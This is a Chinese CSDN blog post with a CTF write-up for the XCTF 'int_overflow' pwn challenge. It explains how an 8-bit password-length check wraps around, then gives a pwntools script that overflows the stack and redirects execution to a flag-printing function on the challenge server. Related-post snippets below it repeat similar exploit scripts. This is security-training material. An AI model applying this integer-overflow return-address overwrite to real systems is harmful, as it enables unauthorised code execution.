xctf学习之intoverflow

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量509 收藏 1
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/103940846
版权

此题题目为intoverflow,提示整数溢出,IDA阅读伪代码,发现Success条件是输入password长度为[3,8),而要程序中有个函数what_is_this,功能是cat flag,所以要想获取flag,需要让程序运行此函数,而程序的运行并没有调用此函数,因此,必须溢出。存储输入password长度的变量是短整型,即8位二进制数,范围[0,255],当值大于255时,发生溢出,如256=0,而程序读入password的长度位199h,超过了256+8,所以,在256+3到256+7之间的长度都能满足要求。尝试输入长度为262的password,找到返回地址的偏移量,为24,及25-28字节为返回地址,将返回地址覆盖为what_is_this的地址,即输入了flag,exp:

from pwn import *

p=remote('111.198.29.45','44601')

offset=24

payload='a'*24+p32(0x804868B)+'b'*232

p.recvuntil('Your choice:')

p.sendline("1")

p.recvuntil("Please input your username:\n")

p.sendline("A")

print p.recvuntil("Please input your passwd:\n")

p.sendline(payload) 

print p.recv()

print p.recv()

neuisf
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言int和float的存储和溢出(overflow)
wormhole07
02-28 2176
首先给出编译器版本 cc 可以用来替代 gcc 或 clang 命令。 cc -v Apple clang version 11.0.0 (clang-1100.0.33.8) Target: x86_64-apple-darwin19.3.0 此版本下的各个数据类型长度 size of int: 4 bytes size of float: 4 bytes size of double: 8 ...
攻防世界 int_overflow
09-28 740
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1457
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 942
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
int_overflow的WP(整数溢出)
WangLal的博客
02-14 272
攻防世界PWN int_overflow的WP 基本三步 checksec,file,执行文件 可以看出是个32位文件,且开了NX和RELRO。 之后扔到32位IDA pro 中查看 main函数看不到flag和溢出点,就每一个函数都看一下, 在下面这个函数看到了flag, 点击 what_is_this函数,得到函数地址0X804868B 在函数check—passwd,看起来好像有个溢出点,但不知道是什么溢出 看了一下其他大佬的WP,发现是整数溢出,有兴趣的,可以去这个博客看一下(https://
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 398
[攻防世界]int_overflow巨细
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2628
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XCTF联赛杭州(杭电)站选拔赛,动画效果图.zip
08-22
计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的...
XCTF-HW-pipeline附件
最新发布
11-09
附件
int_overflow
weixin_45846085的博客
05-24 398
1.程序检查 下载附件,checksec一下检查文件保护 只打开了NX保护,栈不可以执行 运行一下程序选择,整个程序功能就是输入一个名字和密码 查看一下程序当中引用的字符串,我们发现了一个cat flag 2.流程分析 使用神器IDA ,查看程序整体逻辑。 在what_is_this函数中发现cat flag,我们的目标就是控制程序去执行,what_is_this这个函数。 这里程序的漏洞很明显strcpy是可以栈溢出的地方 这边我们就可以进行栈溢出。 但是这个程序有一个密码长度检查,那么
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2219
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
int_overflow(xctf)
weixin_43868725的博客
05-06 564
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
int_overflow writeup
ditto的博客
01-06 917
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
day-9 xctf-int_overflow
a525024162806525的博客
09-29 341
xctf-int_overflow 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=undefined checksec文件,No canary found,32位程序: 用ida打开查看: 判断输入,选择功能菜单:1...
xctf int_overflow
pondzhang的专栏
12-09 111
from pwn import * #p = process('./int_overflow') p = remote("220.249.52.133",54612) p.recvuntil('Your choice:') p.sendline('1') p.recvuntil('username:\n') p.sendline('1') p.recvuntil('passwd:\n') payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28) #gdb.
php整数溢出 ctf,经典整数溢出漏洞示例 XCTF int_overflow
weixin_42516581的博客
03-26 1328
原标题:经典整数溢出漏洞示例 XCTF int_overflow 本文为看雪论坛优秀文章看雪论坛作者ID:IS信息整数溢出原理整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下: 对于unsigned short int类型的两个变量var1、var2,假定取值var1 = 1,var2 = 65537。 ...
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 185
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值